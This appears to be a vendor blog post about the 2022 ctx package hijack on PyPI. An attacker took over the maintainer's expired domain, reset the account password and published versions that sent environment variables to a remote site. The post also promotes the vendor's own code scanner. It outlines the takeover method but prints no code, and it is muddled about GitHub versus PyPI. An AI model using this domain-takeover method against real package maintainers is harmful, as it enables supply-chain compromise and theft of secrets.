Open source libraries lay the foundations for modern applications. Polluting the libraries opens up opportunities to create security backdoors at a massive scale. There have been several recent incidents to pollute open source repositories. Here is a story from last week.
On May 2022, a Reddit user posted that he spotted a new update to the ctx library in GitHub. According to the GitHub repo, the library is a “minimal but opinionated dict/object combo (like Bunch)”. The ctx module provides the ctx class which is a subclass of the Python ‘dict’ object. Like Bunch, the library allows dictionary search through attribute access notation. The last update for the library was made in December of 2014. But several versions of ctx had been uploaded in the past few days.
The GitHub repo of the author of the ctx repository showed that no such updates were made. The package versions also looked suspicious. One was v0.1.2 which was the same version as the one that had been there since 2014. Then there had been two updates, one with version number 0.2.2 and another with version number 0.2.6. The version numbering appeared to be arbitrary and inconsistent.
What happened was a simple social engineering attack. The perpetrator noticed that the original maintainer’s domain name had expired. So, he registered the domain name on May 14, 2022. Then he created an email to initiate a password reset email in GitHub. This was trivial. At that point, the perpetrator could introduce the new package on GitHub.
The new package had a few lines of code that were suspicious. Here is the listing.
The code is packing all of the environment variables in a string, encoding it, and forwarding the encoded string in a GET message to a malicious website.
Popular Python bug detection tools were used to see if they would detect the malicious intent in the above code. But two very popular tools returned with zero errors on that code snippet. A couple of screenshots shown below.
Here is the dashboard of SonarQube showing that no bugs had been found.
Here is the dashboard of Codacy. Again, no bugs found.
OpenRefactory’s Intelligent Code Repair (iCR), however, identified that there is an opportunity to leak sensitive data. Here is the detected bug.
Note, iCR does not generate a fix in this case. The way to fix this is to sanitize the tainted data, but the sanitization process is dependent on the domain knowledge that iCR could not fathom. Instead, iCR shows the trace of how the taint flowed from the source to the sensitive sink. This should equip a developer with sufficient information to decide where to sanitize the data and how to sanitize effectively.
In this case though, the malicious code was introduced deliberately. There was nothing to fix here. As such repository poisoning attacks are becoming more and more common, it is imperative that hot spots such as PyPI should scan for malicious content before publishing code. However, the SAST tools should step up and be able to flag the problem in the first place.
Here is a short video that demonstrates the experiment being done.
- The PyPI administrators estimate that about 27,000 malicious copies of ctx were downloaded from the registry.
- The person behind the hack had spoken out. He mentioned that he also compromised the PHPPass Package. He received 1000 environment variables, but he insisted that he did all of this to prove a point; there had been no malicious intent behind it. All the details are here.
- ctx package is not available from PyPI.
- Package is available from GitHub though, after it had been temporarily taken down for a few days.